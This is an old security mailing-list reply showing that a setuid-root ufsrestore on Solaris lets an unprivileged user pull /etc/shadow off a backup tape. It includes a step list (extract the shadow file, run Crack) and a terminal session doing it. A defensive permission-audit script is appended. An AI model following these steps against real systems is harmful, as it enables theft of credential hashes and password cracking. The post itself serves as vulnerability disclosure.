Re: ufsrestore suid root not a security hole
Eduardo E. Silva (esilva NETCOM.COM) Tue, 12 Dec 1995 00:39:30 -0800
- In reply to: Sean Vickery: "ufsrestore suid root not a security hole"
Sean Vickery wrote:
>
> On 14 November 1995, Brett Lymn wrote:
> > According to Jake Luck:
> > >
> > >yeah, but what about /usr/sbin/ufsrestore ?
> > >
> > >it is statically linked, utilizes syslog, and suid root.
> > >
> >
> > If you are a BOFH then just kill the setuid bit on ufsrestore. It
> > means that root has to do the restores but it does close an awful lot
> > of holes (like someone dragging in a QIC and restoring their favourite
> > version of /etc/passwd.... need I say more?). Or you could just
> > remove the global rx though this may bugger up remote root users.
>
> Yes, /usr/sbin/ufsrestore is suid root on my Solaris 2 box. But it is more
> careful than to allow an unprivileged user create or overwrite files just
> anywhere.
>
BUT, it will let you read ANY file from the tape. Including
root owned files such as /etc/shadow.
* Know when UNIX admins run backups.
* Extract files with ufsrestore (/etc/shadow)
* Run Crack.
* Or you could be reading root's mail, CEO email ...etc,etc
$ pwd
/home/esilva/ED_SILVA
$ date
Mon Dec 11 19:33:13 PST 1995
$ /usr/ucb/whoami
esilva
$ mt -f /dev/rmt/0 status
Exabyte EXB-8500 8mm tape drive:
sense key(0x0)= No Additional Sense residual= 0 retries= 0
file no= 0 block no= 0
$ mt -f /dev/rmt/0 rewind
$ pwd
/home/esilva/ED_SILVA
$ ufsrestore -i /dev/rmt/0cn
ufsrestore >
ufsrestore > ls
.:
.rhosts .sh_history devices/ etc/
ufsrestore > cd etc
ufsrestore > add shadow
ufsrestore > extract
You have not read any volumes yet.
Unless you know which volume your file(s) are on you should start
with the last volume and work towards the first.
Specify next volume #: 1
set owner/mode for '.'? [yn] y
ufsrestore > quit
$ pwd
/home/esilva/ED_SILVA
$ cd etc
$ ls -la
total 8
drwxrwxr-x 2 esilva other 512 Dec 11 19:54 .
drwxr-xr-x 3 esilva other 512 Oct 11 21:48 ..
-r-------- 1 esilva other 1144 Oct 9 09:21 shadow.1.la
Now run crack...
--
Thanks!
-Ed _
/\o/\
/ <_> \
/^^/ \^^\
/___\
+---------------------------------------------------------------------+
| Can you see them all around us? |
+---------------------------------------------------------------------+
| esilva
netcom.com |
+---------------------------------------------------------------------+
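
An added example, not part of the original post: a POSIX shell check for the two mitigations Brett Lymn suggests in the quoted text (dropping the setuid bit, or dropping access for "other"). The function names and result labels are assumptions made for this example; /usr/sbin/ufsrestore is the path named in the thread.

```shell
#!/bin/sh
# Added example (not from the thread): report whether a restore binary is
# still setuid and still executable by "other".

# has_perm FILE MODE -> succeeds if every bit in MODE is set on FILE
has_perm() {
    [ -n "$(find "$1" -prune -perm "-$2" 2>/dev/null)" ]
}

# audit_setuid FILE -> prints one label:
#   missing            file does not exist
#   not-setuid         setuid bit cleared (first mitigation applied)
#   setuid-restricted  setuid, but no execute bit for "other" (second mitigation)
#   setuid-exposed     setuid and executable by any local user
audit_setuid() {
    f=$1
    if [ ! -e "$f" ]; then
        echo missing
    elif ! has_perm "$f" 4000; then
        echo not-setuid
    elif has_perm "$f" 0001; then
        echo setuid-exposed
    else
        echo setuid-restricted
    fi
}

# audit_paths [FILE...] -> prints "path: label (owner)" per file and
# returns 1 if any file is setuid-exposed. Defaults to the thread's path.
audit_paths() {
    [ $# -eq 0 ] && set -- /usr/sbin/ufsrestore
    rc=0
    for p in "$@"; do
        state=$(audit_setuid "$p")
        owner=$(ls -ld "$p" 2>/dev/null | awk '{print $3}')
        printf '%s: %s (owner: %s)\n' "$p" "$state" "${owner:-n/a}"
        [ "$state" = setuid-exposed ] && rc=1
    done
    return $rc
}

audit_paths "$@"
```
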